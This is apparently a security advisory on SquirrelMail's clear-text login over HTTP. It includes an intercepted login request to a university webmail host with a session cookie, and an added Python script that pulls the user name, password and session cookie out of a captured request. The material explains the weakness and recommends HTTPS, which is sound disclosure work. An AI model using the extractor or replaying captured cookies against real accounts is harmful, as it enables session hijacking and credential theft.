-=[Cookie Hijacking in Squirrelmail]=-
=======================================
Triosec, SecNiche Security

This note describes a weakness in the way credentials are supplied to the SquirrelMail webmail application when it is served over plain HTTP. The credentials cross the LAN as clear text whenever a user logs in through SquirrelMail. Several people have contacted me about this after passwords for their accounts were stolen on the local area network.

Two things are exposed to anyone who can sniff the segment:

  1. The session cookie (SQMSESSID), which can be hijacked and replayed to take over the logged-in session without knowing the password.
  2. The password itself, which travels over the wire in clear text.

Both exist because SquirrelMail submits the login form as an ordinary HTTP POST; with no TLS on the connection, anyone on the path can read it. Let's look at the implementation code.

-=[Login.php code from Squirrelmail]=-
=======================================

Excerpt from src/login.php. The three form-building lines are quoted out of the larger concatenated expression that builds the login form, which is why they end in commas and dots.

    if ( !empty($_SESSION['session_expired_post']) &&
         !empty($_SESSION['session_expired_location']) ) {
        /* preserve the expired session's POST data and location across the reset */
        $sep = $_SESSION['session_expired_post'];
        $sel = $_SESSION['session_expired_location'];
        sqsession_destroy();
        sqsession_is_active();
        sqsession_register($sep, 'session_expired_post');
        sqsession_register($sel, 'session_expired_location');
    } else {
        sqsession_destroy();
    }

    do_hook('login_cookie');

    /* pre-fill the username if one was passed in; it is HTML-escaped for display only */
    $loginname_value = (sqGetGlobalVar('loginname', $loginname) ? htmlspecialchars($loginname) : '');

    /* the form fields: a plain text input for the user name and a plain
       password input (addPwField) for the password; nothing is hashed */
        addInput($username_form_name, $loginname_value),
        addPwField($password_form_name).
        addHidden('js_autodetect_results', SMPREF_JS_OFF).

    if(sqgetGlobalVar('mailtodata', $mailtodata)) {
        $mailtofield = addHidden('mailtodata', $mailtodata);
    } else {
        $mailtofield = '';
    }

The code applies no digest or other transformation to the credentials before they are posted to the server: the username and password fields are submitted exactly as typed. That is the normal design for a web login form; confidentiality is expected to come from the transport (HTTPS), not from the application. A client-side hash would not fix this either, since whatever token the browser sends is what the attacker captures and replays. The practical fix is to serve SquirrelMail only over HTTPS and to mark the session cookie Secure, so the browser never sends SQMSESSID over plain HTTP.

-=[ Testing ]=-
==================

Let's perform the penetration-testing step. I loaded the Odysseus proxy interceptor to sit between the browser and the server, and supplied:

  username : User_Penetration
  password : Pass_Penetration

The POST body went out as:

  login_username=User_Penetration&secretkey=Pass_Penetration&js_autodetect_results=1&just_logged_in=1&button=Login

The intercepted HTTP request:

  POST /nutsmail/src/redirect.php HTTP/1.1
  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
  Referer: http://webmail.iiita.ac.in/nutsmail/src/login.php
  Accept-Language: en-us
  Content-Type: application/x-www-form-urlencoded
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
  Host: webmail.iiita.ac.in
  Content-Length: 112
  Proxy-Connection: Keep-Alive
  Pragma: no-cache
  Cookie: user=VWgOYQVwVGJTZAk4BjRXYA5mVDQ%3D; SQMSESSID=86f3311f159ace64f4439600aba6f526

  login_username=User_Penetration&secretkey=Pass_Penetration&js_autodetect_results=1&just_logged_in=1&button=Login

Two things are worth checking in this capture. First, the declared Content-Length of 112 matches the length of the body, so the capture is complete and not truncated. Second, the request carries both secrets at once: the secretkey field holds the password, and the Cookie header holds the SQMSESSID session identifier. Anyone who can sniff the LAN segment, or who is otherwise on the path between browser and server, obtains both without any effort; the cookie alone is enough to hijack the session, and the password gives persistent access to the account.

=====
Zknk
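The following is an added example, not code from the advisory or from SquirrelMail. It parses a raw HTTP login request of the kind shown above (the capture is re-typed inline as constructed sample input, with the long Accept/User-Agent headers dropped) and extracts exactly what a passive LAN sniffer gets: the user name, the clear-text password from the secretkey field, and the SQMSESSID session cookie. It also performs the Content-Length integrity check described above, so a truncated capture is not mistaken for a complete one. The field and cookie names it looks for are assumptions chosen to cover SquirrelMail and generic PHP logins.

```python
"""Added example: what a passive sniffer recovers from a SquirrelMail login POST."""
from urllib.parse import parse_qs

# Constructed sample input: the request from the advisory, re-typed as a raw
# HTTP/1.1 message (Accept and User-Agent headers omitted for brevity).
CAPTURED_REQUEST = (
    "POST /nutsmail/src/redirect.php HTTP/1.1\r\n"
    "Referer: http://webmail.iiita.ac.in/nutsmail/src/login.php\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: webmail.iiita.ac.in\r\n"
    "Content-Length: 112\r\n"
    "Cookie: user=VWgOYQVwVGJTZAk4BjRXYA5mVDQ%3D; "
    "SQMSESSID=86f3311f159ace64f4439600aba6f526\r\n"
    "\r\n"
    "login_username=User_Penetration&secretkey=Pass_Penetration"
    "&js_autodetect_results=1&just_logged_in=1&button=Login"
)

# Assumed names: SquirrelMail posts the password as 'secretkey'; the others are
# common PHP login field names. SQMSESSID is SquirrelMail's session cookie.
PASSWORD_FIELDS = ("secretkey", "password", "passwd", "pass")
USERNAME_FIELDS = ("login_username", "username", "user", "login")
SESSION_COOKIES = ("SQMSESSID", "PHPSESSID")


def parse_request(raw):
    """Split a raw HTTP request into request line, headers (lower-cased) and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def parse_cookies(header):
    """Parse a Cookie request header into a dict; values are kept as sent."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def sniff_login(raw):
    """Return everything an on-path observer learns from a clear-text login POST."""
    req = parse_request(raw)
    form = {k: v[0] for k, v in
            parse_qs(req["body"], keep_blank_values=True).items()}
    cookies = parse_cookies(req["headers"].get("cookie", ""))

    declared = int(req["headers"].get("content-length", "0"))
    return {
        "host": req["headers"].get("host"),
        "path": req["path"],
        "username": next((form[f] for f in USERNAME_FIELDS if f in form), None),
        "password": next((form[f] for f in PASSWORD_FIELDS if f in form), None),
        # the session cookie alone is enough to hijack the logged-in session
        "session_cookies": {k: v for k, v in cookies.items() if k in SESSION_COOKIES},
        # a capture whose body is shorter than Content-Length is truncated
        "content_length_ok": declared == len(req["body"].encode()),
        # the login page was reached over http://, so no TLS protected the POST
        "plaintext_transport": req["headers"].get("referer", "").startswith("http://"),
    }


if __name__ == "__main__":
    for key, value in sniff_login(CAPTURED_REQUEST).items():
        print(f"{key:20} {value}")
```

Run against the sample it prints the user name, the password Pass_Penetration and the SQMSESSID value, and reports the capture as complete (112 bytes declared, 112 received). Feeding it a capture cut short by the sniffer flips content_length_ok to False, which is the first thing to verify before trusting a recovered password.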